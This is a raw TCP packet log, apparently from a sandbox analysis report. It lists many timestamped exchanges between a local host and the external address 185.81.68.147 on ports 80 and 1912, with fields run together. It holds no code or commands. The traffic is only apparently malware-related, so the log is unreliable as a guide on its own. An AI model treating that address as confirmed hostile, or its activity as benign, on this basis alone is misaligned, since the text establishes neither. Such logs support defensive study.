                                                                                                                                                                Dec 13, 2024 01:37:23.653271914 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.653414011 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.653469086 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.654901028 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.655045033 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.655111074 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.656405926 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.656528950 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.656601906 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.657907963 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.658021927 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.659413099 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.659487963 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.659521103 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.660806894 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.660857916 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.660980940 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.661041021 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.662323952 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.662444115 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.662513971 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.663763046 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.663882971 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.663958073 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.665198088 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.665302992 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.665358067 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.666649103 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.666819096 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.668076992 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.668169022 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.668239117 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.669522047 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.669645071 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.669712067 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.670953989 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.671070099 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.671129942 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.672369003 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.672476053 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.672540903 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.673810005 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.673847914 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.675306082 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.675369024 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.675376892 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.676696062 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.676760912 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.676815987 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.678075075 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.678132057 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.678193092 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.679511070 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.679553986 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.679564953 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.680773020 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.680960894 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.681086063 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.681134939 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.682400942 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.682495117 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.682558060 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.683834076 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.683952093 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.684005022 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.685267925 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.685364962 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.686745882 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.686810970 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.686822891 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.688122988 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.688175917 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.688244104 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.688776970 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.689568996 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.689656973 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.690990925 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.691023111 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.691071987 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.691097021 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.692444086 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.692630053 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.692795992 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.693845034 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.693944931 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.694190025 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.695257902 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.695425034 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.695489883 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.696728945 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.696854115 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.698134899 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.698204041 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.698256969 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.699598074 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.699675083 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.699693918 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.700778961 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.701014042 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.701138020 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.701191902 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.702452898 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.702557087 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.702621937 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.703882933 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.704008102 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.704075098 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.705331087 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.705470085 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.706774950 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.706860065 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.706882954 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.708209038 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.708276033 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.708316088 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.708782911 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.709609985 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.709738016 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.709795952 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.711060047 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.711203098 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.711251020 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.712481976 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.712590933 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.712781906 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.713905096 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.714034081 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.714092016 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.715356112 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.715447903 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.715636969 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.716748953 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.770322084 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.836783886 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.836898088 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.837017059 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.837322950 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.837487936 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.838234901 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.838557005 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.838675976 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.838737011 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.839807987 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.839900970 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.840177059 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.841083050 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.841197014 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.841269970 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.842288971 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.842366934 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.843492031 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.843578100 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.843650103 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.844733953 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.844851017 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.845972061 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.846043110 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.846076965 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.847182989 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.847244978 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.847301960 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.848440886 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.848494053 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.848500967 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.848769903 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.849678993 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.849822044 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.849873066 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.850897074 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.851027966 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.851092100 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.852108002 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.852221966 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.852278948 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.853364944 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.853481054 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.853529930 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.854600906 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.854718924 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.854764938 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.855804920 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.855943918 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.857063055 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.857167006 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.857676029 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.858285904 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.858365059 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.858438969 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.859554052 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.859666109 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.859721899 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.860758066 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.860873938 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.860920906 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.861977100 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.862077951 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.862128019 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.863203049 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.863342047 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.863393068 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.864465952 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.864586115 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.864635944 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.865657091 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.865753889 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.865801096 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.866880894 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.867002010 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.867050886 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.868170023 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.868257999 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.868304014 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.869368076 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.869452000 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.869499922 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.870668888 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.870763063 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.870817900 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.871949911 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.872062922 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.872109890 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.873116016 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.873264074 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.873327017 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.874313116 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.874423981 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.874489069 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.875538111 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.875636101 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.875680923 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.876817942 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.876843929 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.876888037 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.877999067 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.878114939 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.878168106 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.879236937 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.879369974 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.879417896 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.880489111 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.880670071 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.880733967 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.881720066 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.881814003 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.881859064 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.882955074 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.883068085 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.883121014 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.884176016 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.884301901 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.884347916 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.885400057 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.885504961 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.885549068 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.886640072 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.886780977 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.886823893 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.887912989 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.888022900 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.888071060 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.889122963 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.889240980 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.889296055 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.890382051 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.890502930 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.890566111 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.891607046 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.891719103 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.891783953 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.892832041 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.892940044 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.893004894 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.894053936 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.894169092 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.894228935 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.895272970 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.895387888 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.895446062 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.896508932 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.896590948 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.896610975 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:24.016639948 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:24.083343029 CET4973280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:24.203177929 CET8049732185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:24.203260899 CET4973280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:24.203330040 CET4973280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:24.323115110 CET8049732185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:24.323175907 CET4973280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:24.442970037 CET8049732185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:25.136694908 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:25.256771088 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:25.256907940 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:25.266942024 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:25.386883020 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:25.665555954 CET8049732185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:25.665626049 CET8049732185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:25.665679932 CET4973280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:25.666855097 CET4973280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:25.770833015 CET4973980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:25.789239883 CET8049732185.81.68.147192.168.2.5
